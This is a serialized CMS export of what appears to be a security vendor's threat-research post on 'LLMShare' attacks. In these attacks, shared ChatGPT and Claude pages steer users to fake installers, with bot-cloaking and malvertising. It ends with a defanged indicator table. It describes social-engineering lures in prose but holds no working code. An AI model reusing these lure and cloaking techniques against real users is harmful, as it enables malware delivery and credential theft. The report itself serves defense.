",{"data":8444,"content":8446,"nodeType":940},{"uri":8445},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002F30000-facebook-accounts-hacked-via.html",[8447],{"data":8448,"marks":8449,"value":8450,"nodeType":883},{},[],"AccountDumpling used Google AppSheet's built-in email capability",{"data":8452,"marks":8453,"value":8454,"nodeType":883},{},[]," as a phishing relay to harvest 30,000 Facebook credentials. ",{"data":8456,"content":8458,"nodeType":940},{"uri":8457},"https:\u002F\u002Ftechcrunch.com\u002F2026\u002F05\u002F21\u002Fscammers-are-abusing-an-internal-microsoft-account-to-send-spam\u002F",[8459],{"data":8460,"marks":8461,"value":8462,"nodeType":883},{},[],"Scammers exploited Microsoft's own internal notification pipeline",{"data":8464,"marks":8465,"value":8466,"nodeType":883},{},[]," — sending phishing from the same msonlineservicesteam@microsoftonline.com address that delivers legitimate 2FA codes — with Spamhaus confirming months of ongoing abuse.",{"data":8468,"content":8469,"nodeType":1036},{},[8470],{"data":8471,"marks":8472,"value":8473,"nodeType":883},{},[],"Legit platform abuse for hosting",{"data":8475,"content":8476,"nodeType":879},{},[8477,8481,8489,8493,8501],{"data":8478,"marks":8479,"value":8480,"nodeType":883},{},[],"For hosting, the platforms being abused read like a who's who of modern web infrastructure. ",{"data":8482,"content":8484,"nodeType":940},{"uri":8483},"https:\u002F\u002Fwww.securityweek.com\u002Fover-500-organizations-hit-in-years-long-phishing-campaign\u002F",[8485],{"data":8486,"marks":8487,"value":8488,"nodeType":883},{},[],"Operation HookedWing ran for four years",{"data":8490,"marks":8491,"value":8492,"nodeType":883},{},[]," on GitHub Pages and Vercel, compromising 500+ organizations across more than 100 GitHub Pages domains before anyone documented it publicly. Cofense has separately ",{"data":8494,"content":8496,"nodeType":940},{"uri":8495},"https:\u002F\u002Fcofense.com\u002Fblog\u002Fsteal-smarter-not-harder-malicious-use-of-vercel-for-credential-phishing\u002F",[8497],{"data":8498,"marks":8499,"value":8500,"nodeType":883},{},[],"documented the growing abuse of Vercel",{"data":8502,"marks":8503,"value":8504,"nodeType":883},{},[]," for credential phishing hosting. Pixm's Q1 2026 phishing report tracked over 100 unique Azure Blob Storage subdomain variants hosting phishing content that carried Microsoft's own domain reputation, alongside abuse of Cloudflare CDN, Cloudflare Workers, Cloudflare R2, Backblaze B2, and Supabase. ",{"data":8506,"content":8507,"nodeType":1036},{},[8508],{"data":8509,"marks":8510,"value":8511,"nodeType":883},{},[],"Abuse of compromised websites that are otherwise legit",{"data":8513,"content":8514,"nodeType":879},{},[8515,8519,8527,8531,8539,8543,8551],{"data":8516,"marks":8517,"value":8518,"nodeType":883},{},[],"Compromised legitimate sites are also being repurposed at scale. A mass exploitation of a ",{"data":8520,"content":8522,"nodeType":940},{"uri":8521},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign\u002F",[8523],{"data":8524,"marks":8525,"value":8526,"nodeType":883},{},[],"Ghost CMS vulnerability planted ClickFix pages across 700+ websites",{"data":8528,"marks":8529,"value":8530,"nodeType":883},{},[]," including Harvard, Oxford, and DuckDuckGo subdomains. Microsoft recently documented a campaign where ",{"data":8532,"content":8534,"nodeType":940},{"uri":8533},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F05\u002F26\u002Fpoisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities\u002F",[8535],{"data":8536,"marks":8537,"value":8538,"nodeType":883},{},[],"SEO poisoning was combined with AI chatbot recommendation manipulation",{"data":8540,"marks":8541,"value":8542,"nodeType":883},{},[]," to deliver GPU mining malware — extending the poisoning from traditional search results into AI-generated software recommendations. And ",{"data":8544,"content":8546,"nodeType":940},{"uri":8545},"https:\u002F\u002Fwww.helpnetsecurity.com\u002F2026\u002F05\u002F27\u002Fdeno-rat-malware-fake-chatgpt-claude-installers\u002F",[8547],{"data":8548,"marks":8549,"value":8550,"nodeType":883},{},[],"fake ChatGPT and Claude installers on GitHub and SourceForge",{"data":8552,"marks":8553,"value":8554,"nodeType":883},{},[]," have been delivering the DinDoor backdoor and a Deno-based RAT via repositories that mimic legitimate developer tool distributions.",{"data":8556,"content":8557,"nodeType":879},{},[8558],{"data":8559,"marks":8560,"value":8561,"nodeType":883},{},[],"The structural problem is that every one of these platforms is genuinely legitimate, and the security controls that evaluate them — domain reputation, email authentication, URL categorization — confirm them as trusted because they are trusted. This attack extends this pattern into new territory by weaponizing the content-sharing features of AI chatbot platforms specifically, but the underlying principles are the same. ",{"data":8563,"content":8564,"nodeType":905},{},[],{"data":8566,"content":8567,"nodeType":909},{},[8568],{"data":8569,"marks":8570,"value":8572,"nodeType":883},{},[8571],{"type":916},"Impact analysis",{"data":8574,"content":8575,"nodeType":879},{},[8576,8580,8588],{"data":8577,"marks":8578,"value":8579,"nodeType":883},{},[],"Shared-chat malware delivery exploits a structural property of AI platforms that traditional security controls aren't designed to handle. Domain reputation, URL categorization, and safe browsing databases all treat chatgpt.com and claude.ai as trusted — because they are. Using these trusted pages to link off to further convincing-looking pages hosting malware allows the attacker to run campaigns that blend in, as well as rotate the phishing delivery pages later in the chain should they ever be flagged, allowing the campaign to continue without interruption (a well known ",{"data":8581,"content":8583,"nodeType":940},{"uri":8582},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002F",[8584],{"data":8585,"marks":8586,"value":8587,"nodeType":883},{},[],"detection evasion technique",{"data":8589,"marks":8590,"value":8591,"nodeType":883},{},[],"). ",{"data":8593,"content":8594,"nodeType":879},{},[8595],{"data":8596,"marks":8597,"value":8598,"nodeType":883},{},[],"What makes the rendered-page variant particularly concerning is that it eliminates the most obvious red flag in the earlier attacks. The Claude.ai conversation variants required the victim to recognize that a shared chat instructing them to paste terminal commands might be suspicious — a tall order for many users, but at least the attack surface was visible. The rendered-page variant shows nothing that looks like an attack. It presents what appears to be a routine service disruption with a reasonable call to action: download the desktop app to continue using ChatGPT. ",{"data":8600,"content":8601,"nodeType":1036},{},[8602],{"data":8603,"marks":8604,"value":8606,"nodeType":883},{},[8605],{"type":916},"How Push detected the attack",{"data":8608,"content":8609,"nodeType":879},{},[8610,8614,8618],{"data":8611,"marks":8612,"value":8613,"nodeType":883},{},[],"We've aligned our detection logic for this technique under the name ",{"data":8615,"marks":8616,"value":1838,"nodeType":883},{},[8617],{"type":916},{"data":8619,"marks":8620,"value":8621,"nodeType":883},{},[]," — a technique-level detection that covers shared content abuse across LLM platforms, not tied to any single campaign or set of IOCs. ",{"data":8623,"content":8624,"nodeType":879},{},[8625],{"data":8626,"marks":8627,"value":8628,"nodeType":883},{},[],"Because Push sees the full context of how a user arrived at a page and what that page does once it renders, we can identify LLMShare attacks regardless of which AI platform is being abused or what social engineering wrapper the attacker has chosen. ",{"data":8630,"content":8631,"nodeType":879},{},[8632,8636,8644],{"data":8633,"marks":8634,"value":8635,"nodeType":883},{},[],"When we identified the initial instances of this campaign, we used our ",{"data":8637,"content":8639,"nodeType":940},{"uri":8638},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline\u002F",[8640],{"data":8641,"marks":8642,"value":8643,"nodeType":883},{},[],"agentic threat hunting pipeline",{"data":8645,"marks":8646,"value":8647,"nodeType":883},{},[]," to hunt for additional examples across our customer telemetry, develop the LLMShare detection, and rapidly deploy it to customers. Push blocks users from interacting with the page before any malicious activity can occur. ",{"data":8649,"content":8650,"nodeType":879},{},[8651],{"data":8652,"marks":8653,"value":8654,"nodeType":883},{},[],"Push customers do not need to take any further action.",{"data":8656,"content":8657,"nodeType":905},{},[],{"data":8659,"content":8660,"nodeType":879},{},[8661],{"data":8662,"marks":8663,"value":1729,"nodeType":883},{},[],{"data":8665,"content":8666,"nodeType":879},{},[8667],{"data":8668,"marks":8669,"value":1736,"nodeType":883},{},[],{"data":8671,"content":8672,"nodeType":879},{},[8673,8676,8683],{"data":8674,"marks":8675,"value":21,"nodeType":883},{},[],{"data":8677,"content":8678,"nodeType":940},{"uri":3254},[8679],{"data":8680,"marks":8681,"value":3260,"nodeType":883},{},[8682],{"type":948},{"data":8684,"marks":8685,"value":21,"nodeType":883},{},[],{"data":8687,"content":8688,"nodeType":905},{},[],{"data":8690,"content":8691,"nodeType":909},{},[8692],{"data":8693,"marks":8694,"value":8696,"nodeType":883},{},[8695],{"type":916},"Indicators of compromise",{"data":8698,"content":8699,"nodeType":879},{},[8700,8704,8712],{"data":8701,"marks":8702,"value":8703,"nodeType":883},{},[],"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",{"data":8705,"content":8707,"nodeType":940},{"uri":8706},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fdomain-rotation-redirection\u002F",[8708],{"data":8709,"marks":8710,"value":8711,"nodeType":883},{},[],"quickly spin up and rotate the sites used",{"data":8713,"marks":8714,"value":8715,"nodeType":883},{},[]," in the attack chain. IoC-based detections for campaigns like this are of limited value.",{"data":8717,"content":8718,"nodeType":879},{},[8719],{"data":8720,"marks":8721,"value":8722,"nodeType":883},{},[],"At the time of writing, the indicators observed were:",{"data":8724,"content":8725,"nodeType":8845},{},[8726,8753,8777,8799,8822],{"data":8727,"content":8728,"nodeType":8752},{},[8729,8741],{"data":8730,"content":8731,"nodeType":8740},{},[8732],{"data":8733,"content":8734,"nodeType":879},{},[8735],{"data":8736,"marks":8737,"value":8739,"nodeType":883},{},[8738],{"type":916},"Indicator","table-header-cell",{"data":8742,"content":8743,"nodeType":8740},{},[8744],{"data":8745,"content":8746,"nodeType":879},{},[8747],{"data":8748,"marks":8749,"value":8751,"nodeType":883},{},[8750],{"type":916},"Type","table-row",{"data":8754,"content":8755,"nodeType":8752},{},[8756,8767],{"data":8757,"content":8758,"nodeType":8766},{},[8759],{"data":8760,"content":8761,"nodeType":879},{},[8762],{"data":8763,"marks":8764,"value":8765,"nodeType":883},{},[],"hxxps:\u002F\u002Fclaude[.]ai\u002Fshare\u002F8e6401b5-4849-46c4-a3cb-29e1c3c49131","table-cell",{"data":8768,"content":8769,"nodeType":8766},{},[8770],{"data":8771,"content":8772,"nodeType":879},{},[8773],{"data":8774,"marks":8775,"value":8776,"nodeType":883},{},[],"URL",{"data":8778,"content":8779,"nodeType":8752},{},[8780,8790],{"data":8781,"content":8782,"nodeType":8766},{},[8783],{"data":8784,"content":8785,"nodeType":879},{},[8786],{"data":8787,"marks":8788,"value":8789,"nodeType":883},{},[],"hxxps:\u002F\u002Fchatgpt[.]com\u002Fs\u002Fcb_6a0f1e6bbec88191aa7fede27163f08d",{"data":8791,"content":8792,"nodeType":8766},{},[8793],{"data":8794,"content":8795,"nodeType":879},{},[8796],{"data":8797,"marks":8798,"value":8776,"nodeType":883},{},[],{"data":8800,"content":8801,"nodeType":8752},{},[8802,8812],{"data":8803,"content":8804,"nodeType":8766},{},[8805],{"data":8806,"content":8807,"nodeType":879},{},[8808],{"data":8809,"marks":8810,"value":8811,"nodeType":883},{},[],"openew[.]app",{"data":8813,"content":8814,"nodeType":8766},{},[8815],{"data":8816,"content":8817,"nodeType":879},{},[8818],{"data":8819,"marks":8820,"value":8821,"nodeType":883},{},[],"Domain",{"data":8823,"content":8824,"nodeType":8752},{},[8825,8835],{"data":8826,"content":8827,"nodeType":8766},{},[8828],{"data":8829,"content":8830,"nodeType":879},{},[8831],{"data":8832,"marks":8833,"value":8834,"nodeType":883},{},[],"de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",{"data":8836,"content":8837,"nodeType":8766},{},[8838],{"data":8839,"content":8840,"nodeType":879},{},[8841],{"data":8842,"marks":8843,"value":8844,"nodeType":883},{},[],"SHA256","table",{"data":8847,"content":8848,"nodeType":879},{},[8849],{"data":8850,"marks":8851,"value":21,"nodeType":883},{},[],{"entries":8853},{"hyperlink":8854,"inline":8855,"block":8856},[],[],[8857,8863,8888,8895,8902,8909,8916,8924,8931,8939],{"sys":8858,"__typename":1765,"title":8859,"caption":59,"layoutMode":59,"file":8860},{"id":8122},"LLMShare pages side by side",{"url":8861,"width":1781,"height":8862},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7u7yyvyg3P9jepZi7iIwxf\u002Fd2c42d257d2e7ac4dfe28c37aa69a4b3\u002Fimage4.png",875,{"sys":8864,"__typename":1785,"content":8865,"name":8887,"title":59},{"id":8128},{"json":8866},{"nodeType":875,"data":8867,"content":8868},{},[8869],{"nodeType":879,"data":8870,"content":8871},{},[8872,8876,8883],{"nodeType":883,"value":8873,"marks":8874,"data":8875},"These are essentially InstallFix attacks — a variant of the ClickFix family that ",[],{},{"nodeType":940,"data":8877,"content":8878},{"uri":7409},[8879],{"nodeType":883,"value":8880,"marks":8881,"data":8882},"Push documented earlier this year",[],{},{"nodeType":883,"value":8884,"marks":8885,"data":8886}," — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one. ",[],{},"LLMShare IB1",{"sys":8889,"__typename":1765,"title":8890,"caption":8891,"layoutMode":59,"file":8892},{"id":8180},"LLMShare error page","The fake \"high traffic\" page rendered inside a ChatGPT shared content URL. Note the \"Show code\" and \"Remix with ChatGPT\" buttons at the top, which reveal that this is actually rendered HTML\u002FCSS code rather than a real ChatGPT system page.",{"url":8893,"width":1781,"height":8894},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FsoQtEPyX9aQUfby2Ylm7m\u002F0bb772950b7e3598a343f1609a955ed4\u002Fimage3.png",1750,{"sys":8896,"__typename":1765,"title":8897,"caption":8898,"layoutMode":59,"file":8899},{"id":8200},"LLMShare panel showing source code","The same page with the code panel open, showing the HTML\u002FCSS source code that generates the fake service disruption notice.",{"url":8900,"width":1781,"height":8901},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F22IO2J68rUGy5ZzEAGfFIh\u002Fff98ca14ed74de0c35e5154c43aa1524\u002Fimage7.png",1128,{"sys":8903,"__typename":1765,"title":8904,"caption":8905,"layoutMode":59,"file":8906},{"id":8224},"LLMShare page with download panel","The fake ChatGPT download page hosted at openew[.]app. The design closely replicates OpenAI's legitimate download page.",{"url":8907,"width":1781,"height":8908},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4woFKeexapLYHfpKfCzEbo\u002F8b7fc45a933af8fea5f6bce97823e123\u002Fimage2.png",1210,{"sys":8910,"__typename":1765,"title":8911,"caption":8912,"layoutMode":59,"file":8913},{"id":8230},"Real ChatGPT download page for comparison at chatgpt.com\u002Fdownload.","Real ChatGPT download page for comparison chatgpt.com\u002Fdownload.",{"url":8914,"width":1781,"height":8915},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3hHpXRmxJyRPs4y1SQbHMM\u002F67e33342db5ecb1e3928bb8e1a56749a\u002Fimage5.png",1142,{"sys":8917,"__typename":1765,"title":8918,"caption":8919,"layoutMode":59,"file":8920},{"id":8268},"Alternative LLMShare page for bot visitors","What URLScan sees when visiting the same openew[.]app URL: a generic \"Openew\" AR\u002FVR company website with no trace of the ChatGPT impersonation.",{"url":8921,"width":8922,"height":8923},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FapMKHaMjDF9GmoCO1gVHT\u002Fc25938faf56bb96b467469209470e40c\u002Fimage1.png",1600,1200,{"sys":8925,"__typename":1765,"title":8926,"caption":8926,"layoutMode":59,"file":8927},{"id":8303},"A shared Claude.ai conversation containing malicious installation instructions in the style previously reported by BleepingComputer.",{"url":8928,"width":8929,"height":8930},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2YLf3kEK2y2XjdyM1Q9uRT\u002F6b5774de9708ff8544889305a094d991\u002Fimage6.png",1920,945,{"sys":8932,"__typename":1765,"title":8933,"caption":8934,"layoutMode":59,"file":8935},{"id":8341},"LLMShare malvertising","The LLMShare ad uses the legitimate ChatGPT domain and is the top result.",{"url":8936,"width":8937,"height":8938},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1aLEhiVJcLPIR4rXdzoCTv\u002Fd87eb30284e61ab813ccf9e662a1fbae\u002Fimage.png",1910,1005,{"sys":8940,"__typename":1785,"content":8941,"name":8976,"title":59},{"id":8347},{"json":8942},{"nodeType":875,"data":8943,"content":8944},{},[8945,8956],{"nodeType":879,"data":8946,"content":8947},{},[8948,8952],{"nodeType":883,"value":8949,"marks":8950,"data":8951},"Although we managed to grab that example, the ads haven't been easy to reproduce.",[],{},{"nodeType":883,"value":8953,"marks":8954,"data":8955}," This is because the ads are likely geographically or temporally scoped. It’s pretty eye-opening (and creepy) how tightly scoped these kinds of sponsored ads can be across different platforms. ",[],{},{"nodeType":879,"data":8957,"content":8958},{},[8959,8963,8972],{"nodeType":883,"value":8960,"marks":8961,"data":8962},"This is one of the key misconceptions people can have about this kind of attack. It’s easy to see it as untargeted, when realistically it can be scoped tightly to a desired victim population by role, geography, and so on. We’ve written about this previously in ",[],{},{"nodeType":940,"data":8964,"content":8966},{"uri":8965},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fcyber-criminal-ecosystem-analysis\u002F",[8967],{"nodeType":883,"value":8968,"marks":8969,"data":8971},"our blog",[8970],{"type":948},{},{"nodeType":883,"value":8973,"marks":8974,"data":8975}," on the ad account takeover > malvertising ecosystem. ",[],{},"LLMShare IB2",{"items":8978},[],{},"LLMShare: using shared chatbot pages to distribute malware","threat-research","2026-05-29T00:00:00.000Z",{"items":8984},[8985,9706,10729],{"__typename":1967,"sys":8986,"content":8987,"title":7965,"synopsis":7966,"hashTags":59,"publishedDate":7967,"slug":7968,"tagsCollection":9696,"authorsCollection":9702},{"id":7130},{"json":8988},{"data":8989,"content":8990,"nodeType":875},{},[8991,9006,9021,9036,9041,9044,9051,9057,9063,9069,9075,9082,9085,9092,9098,9104,9110,9115,9122,9137,9143,9149,9162,9169,9193,9206,9212,9236,9243,9267,9273,9280,9295,9301,9307,9312,9318,9325,9340,9346,9362,9368,9371,9378,9384,9459,9465,9478,9481,9506,9521,9527,9533,9536,9543,9558,9564,9570,9585,9588,9595,9601,9631,9637,9652,9667,9672,9675,9681],{"data":8992,"content":8993,"nodeType":879},{},[8994,8997,9003],{"data":8995,"marks":8996,"value":7141,"nodeType":883},{},[],{"data":8998,"content":8999,"nodeType":940},{"uri":7144},[9000],{"data":9001,"marks":9002,"value":7149,"nodeType":883},{},[],{"data":9004,"marks":9005,"value":7153,"nodeType":883},{},[],{"data":9007,"content":9008,"nodeType":879},{},[9009,9012,9018],{"data":9010,"marks":9011,"value":7160,"nodeType":883},{},[],{"data":9013,"content":9014,"nodeType":940},{"uri":7163},[9015],{"data":9016,"marks":9017,"value":7168,"nodeType":883},{},[],{"data":9019,"marks":9020,"value":7172,"nodeType":883},{},[],{"data":9022,"content":9023,"nodeType":879},{},[9024,9027,9033],{"data":9025,"marks":9026,"value":7179,"nodeType":883},{},[],{"data":9028,"content":9029,"nodeType":940},{"uri":7182},[9030],{"data":9031,"marks":9032,"value":7187,"nodeType":883},{},[],{"data":9034,"marks":9035,"value":7191,"nodeType":883},{},[],{"data":9037,"content":9040,"nodeType":971},{"target":9038},{"sys":9039},{"id":7196,"type":976,"linkType":977},[],{"data":9042,"content":9043,"nodeType":905},{},[],{"data":9045,"content":9046,"nodeType":909},{},[9047],{"data":9048,"marks":9049,"value":7208,"nodeType":883},{},[9050],{"type":916},{"data":9052,"content":9053,"nodeType":879},{},[9054],{"data":9055,"marks":9056,"value":7215,"nodeType":883},{},[],{"data":9058,"content":9059,"nodeType":879},{},[9060],{"data":9061,"marks":9062,"value":7222,"nodeType":883},{},[],{"data":9064,"content":9065,"nodeType":879},{},[9066],{"data":9067,"marks":9068,"value":7229,"nodeType":883},{},[],{"data":9070,"content":9071,"nodeType":879},{},[9072],{"data":9073,"marks":9074,"value":7236,"nodeType":883},{},[],{"data":9076,"content":9077,"nodeType":879},{},[9078],{"data":9079,"marks":9080,"value":7244,"nodeType":883},{},[9081],{"type":916},{"data":9083,"content":9084,"nodeType":905},{},[],{"data":9086,"content":9087,"nodeType":909},{},[9088],{"data":9089,"marks":9090,"value":7255,"nodeType":883},{},[9091],{"type":916},{"data":9093,"content":9094,"nodeType":879},{},[9095],{"data":9096,"marks":9097,"value":7262,"nodeType":883},{},[],{"data":9099,"content":9100,"nodeType":879},{},[9101],{"data":9102,"marks":9103,"value":7269,"nodeType":883},{},[],{"data":9105,"content":9106,"nodeType":879},{},[9107],{"data":9108,"marks":9109,"value":7276,"nodeType":883},{},[],{"data":9111,"content":9114,"nodeType":971},{"target":9112},{"sys":9113},{"id":7281,"type":976,"linkType":977},[],{"data":9116,"content":9117,"nodeType":1036},{},[9118],{"data":9119,"marks":9120,"value":7290,"nodeType":883},{},[9121],{"type":916},{"data":9123,"content":9124,"nodeType":879},{},[9125,9128,9134],{"data":9126,"marks":9127,"value":7297,"nodeType":883},{},[],{"data":9129,"content":9130,"nodeType":940},{"uri":7300},[9131],{"data":9132,"marks":9133,"value":7305,"nodeType":883},{},[],{"data":9135,"marks":9136,"value":7309,"nodeType":883},{},[],{"data":9138,"content":9139,"nodeType":879},{},[9140],{"data":9141,"marks":9142,"value":7316,"nodeType":883},{},[],{"data":9144,"content":9145,"nodeType":879},{},[9146],{"data":9147,"marks":9148,"value":7323,"nodeType":883},{},[],{"data":9150,"content":9151,"nodeType":879},{},[9152,9155,9159],{"data":9153,"marks":9154,"value":7330,"nodeType":883},{},[],{"data":9156,"marks":9157,"value":7335,"nodeType":883},{},[9158],{"type":916},{"data":9160,"marks":9161,"value":7339,"nodeType":883},{},[],{"data":9163,"content":9164,"nodeType":1036},{},[9165],{"data":9166,"marks":9167,"value":7347,"nodeType":883},{},[9168],{"type":916},{"data":9170,"content":9171,"nodeType":879},{},[9172,9175,9181,9184,9190],{"data":9173,"marks":9174,"value":7354,"nodeType":883},{},[],{"data":9176,"content":9177,"nodeType":940},{"uri":1144},[9178],{"data":9179,"marks":9180,"value":7361,"nodeType":883},{},[],{"data":9182,"marks":9183,"value":7365,"nodeType":883},{},[],{"data":9185,"content":9186,"nodeType":940},{"uri":1156},[9187],{"data":9188,"marks":9189,"value":7372,"nodeType":883},{},[],{"data":9191,"marks":9192,"value":7376,"nodeType":883},{},[],{"data":9194,"content":9195,"nodeType":879},{},[9196,9199,9203],{"data":9197,"marks":9198,"value":7383,"nodeType":883},{},[],{"data":9200,"marks":9201,"value":7388,"nodeType":883},{},[9202],{"type":916},{"data":9204,"marks":9205,"value":7392,"nodeType":883},{},[],{"data":9207,"content":9208,"nodeType":879},{},[9209],{"data":9210,"marks":9211,"value":7399,"nodeType":883},{},[],{"data":9213,"content":9214,"nodeType":879},{},[9215,9218,9224,9227,9233],{"data":9216,"marks":9217,"value":7406,"nodeType":883},{},[],{"data":9219,"content":9220,"nodeType":940},{"uri":7409},[9221],{"data":9222,"marks":9223,"value":1826,"nodeType":883},{},[],{"data":9225,"marks":9226,"value":7417,"nodeType":883},{},[],{"data":9228,"content":9229,"nodeType":940},{"uri":1331},[9230],{"data":9231,"marks":9232,"value":1321,"nodeType":883},{},[],{"data":9234,"marks":9235,"value":7427,"nodeType":883},{},[],{"data":9237,"content":9238,"nodeType":1036},{},[9239],{"data":9240,"marks":9241,"value":7435,"nodeType":883},{},[9242],{"type":916},{"data":9244,"content":9245,"nodeType":879},{},[9246,9249,9255,9258,9264],{"data":9247,"marks":9248,"value":7442,"nodeType":883},{},[],{"data":9250,"content":9251,"nodeType":940},{"uri":7445},[9252],{"data":9253,"marks":9254,"value":7450,"nodeType":883},{},[],{"data":9256,"marks":9257,"value":7454,"nodeType":883},{},[],{"data":9259,"content":9260,"nodeType":940},{"uri":1343},[9261],{"data":9262,"marks":9263,"value":7461,"nodeType":883},{},[],{"data":9265,"marks":9266,"value":7465,"nodeType":883},{},[],{"data":9268,"content":9269,"nodeType":879},{},[9270],{"data":9271,"marks":9272,"value":7472,"nodeType":883},{},[],{"data":9274,"content":9275,"nodeType":1036},{},[9276],{"data":9277,"marks":9278,"value":7480,"nodeType":883},{},[9279],{"type":916},{"data":9281,"content":9282,"nodeType":879},{},[9283,9286,9292],{"data":9284,"marks":9285,"value":7487,"nodeType":883},{},[],{"data":9287,"content":9288,"nodeType":940},{"uri":2443},[9289],{"data":9290,"marks":9291,"value":7494,"nodeType":883},{},[],{"data":9293,"marks":9294,"value":7498,"nodeType":883},{},[],{"data":9296,"content":9297,"nodeType":879},{},[9298],{"data":9299,"marks":9300,"value":7505,"nodeType":883},{},[],{"data":9302,"content":9303,"nodeType":879},{},[9304],{"data":9305,"marks":9306,"value":7512,"nodeType":883},{},[],{"data":9308,"content":9311,"nodeType":971},{"target":9309},{"sys":9310},{"id":7517,"type":976,"linkType":977},[],{"data":9313,"content":9314,"nodeType":879},{},[9315],{"data":9316,"marks":9317,"value":7525,"nodeType":883},{},[],{"data":9319,"content":9320,"nodeType":1036},{},[9321],{"data":9322,"marks":9323,"value":7533,"nodeType":883},{},[9324],{"type":916},{"data":9326,"content":9327,"nodeType":879},{},[9328,9331,9337],{"data":9329,"marks":9330,"value":7540,"nodeType":883},{},[],{"data":9332,"content":9333,"nodeType":940},{"uri":1440},[9334],{"data":9335,"marks":9336,"value":7547,"nodeType":883},{},[],{"data":9338,"marks":9339,"value":7551,"nodeType":883},{},[],{"data":9341,"content":9342,"nodeType":879},{},[9343],{"data":9344,"marks":9345,"value":7558,"nodeType":883},{},[],{"data":9347,"content":9348,"nodeType":879},{},[9349,9352,9359],{"data":9350,"marks":9351,"value":7565,"nodeType":883},{},[],{"data":9353,"content":9354,"nodeType":940},{"uri":1440},[9355],{"data":9356,"marks":9357,"value":7573,"nodeType":883},{},[9358],{"type":948},{"data":9360,"marks":9361,"value":7577,"nodeType":883},{},[],{"data":9363,"content":9364,"nodeType":879},{},[9365],{"data":9366,"marks":9367,"value":7584,"nodeType":883},{},[],{"data":9369,"content":9370,"nodeType":905},{},[],{"data":9372,"content":9373,"nodeType":909},{},[9374],{"data":9375,"marks":9376,"value":7595,"nodeType":883},{},[9377],{"type":916},{"data":9379,"content":9380,"nodeType":879},{},[9381],{"data":9382,"marks":9383,"value":7602,"nodeType":883},{},[],{"data":9385,"content":9386,"nodeType":1531},{},[9387,9405,9423,9441],{"data":9388,"content":9389,"nodeType":1535},{},[9390],{"data":9391,"content":9392,"nodeType":879},{},[9393,9396,9402],{"data":9394,"marks":9395,"value":7615,"nodeType":883},{},[],{"data":9397,"content":9398,"nodeType":940},{"uri":7618},[9399],{"data":9400,"marks":9401,"value":2006,"nodeType":883},{},[],{"data":9403,"marks":9404,"value":7626,"nodeType":883},{},[],{"data":9406,"content":9407,"nodeType":1535},{},[9408],{"data":9409,"content":9410,"nodeType":879},{},[9411,9414,9420],{"data":9412,"marks":9413,"value":7636,"nodeType":883},{},[],{"data":9415,"content":9416,"nodeType":940},{"uri":7639},[9417],{"data":9418,"marks":9419,"value":7644,"nodeType":883},{},[],{"data":9421,"marks":9422,"value":7648,"nodeType":883},{},[],{"data":9424,"content":9425,"nodeType":1535},{},[9426],{"data":9427,"content":9428,"nodeType":879},{},[9429,9432,9438],{"data":9430,"marks":9431,"value":7615,"nodeType":883},{},[],{"data":9433,"content":9434,"nodeType":940},{"uri":1331},[9435],{"data":9436,"marks":9437,"value":7664,"nodeType":883},{},[],{"data":9439,"marks":9440,"value":7668,"nodeType":883},{},[],{"data":9442,"content":9443,"nodeType":1535},{},[9444],{"data":9445,"content":9446,"nodeType":879},{},[9447,9450,9456],{"data":9448,"marks":9449,"value":3786,"nodeType":883},{},[],{"data":9451,"content":9452,"nodeType":940},{"uri":7680},[9453],{"data":9454,"marks":9455,"value":7685,"nodeType":883},{},[],{"data":9457,"marks":9458,"value":7689,"nodeType":883},{},[],{"data":9460,"content":9461,"nodeType":879},{},[9462],{"data":9463,"marks":9464,"value":7696,"nodeType":883},{},[],{"data":9466,"content":9467,"nodeType":879},{},[9468,9471,9475],{"data":9469,"marks":9470,"value":7703,"nodeType":883},{},[],{"data":9472,"marks":9473,"value":7708,"nodeType":883},{},[9474],{"type":916},{"data":9476,"marks":9477,"value":7712,"nodeType":883},{},[],{"data":9479,"content":9480,"nodeType":905},{},[],{"data":9482,"content":9483,"nodeType":909},{},[9484,9488,9493,9497,9502],{"data":9485,"marks":9486,"value":7723,"nodeType":883},{},[9487],{"type":916},{"data":9489,"marks":9490,"value":7729,"nodeType":883},{},[9491,9492],{"type":891},{"type":916},{"data":9494,"marks":9495,"value":7734,"nodeType":883},{},[9496],{"type":916},{"data":9498,"marks":9499,"value":7740,"nodeType":883},{},[9500,9501],{"type":891},{"type":916},{"data":9503,"marks":9504,"value":7745,"nodeType":883},{},[9505],{"type":916},{"data":9507,"content":9508,"nodeType":879},{},[9509,9512,9518],{"data":9510,"marks":9511,"value":7752,"nodeType":883},{},[],{"data":9513,"content":9514,"nodeType":940},{"uri":7755},[9515],{"data":9516,"marks":9517,"value":7760,"nodeType":883},{},[],{"data":9519,"marks":9520,"value":7764,"nodeType":883},{},[],{"data":9522,"content":9523,"nodeType":879},{},[9524],{"data":9525,"marks":9526,"value":7771,"nodeType":883},{},[],{"data":9528,"content":9529,"nodeType":879},{},[9530],{"data":9531,"marks":9532,"value":7778,"nodeType":883},{},[],{"data":9534,"content":9535,"nodeType":905},{},[],{"data":9537,"content":9538,"nodeType":909},{},[9539],{"data":9540,"marks":9541,"value":7789,"node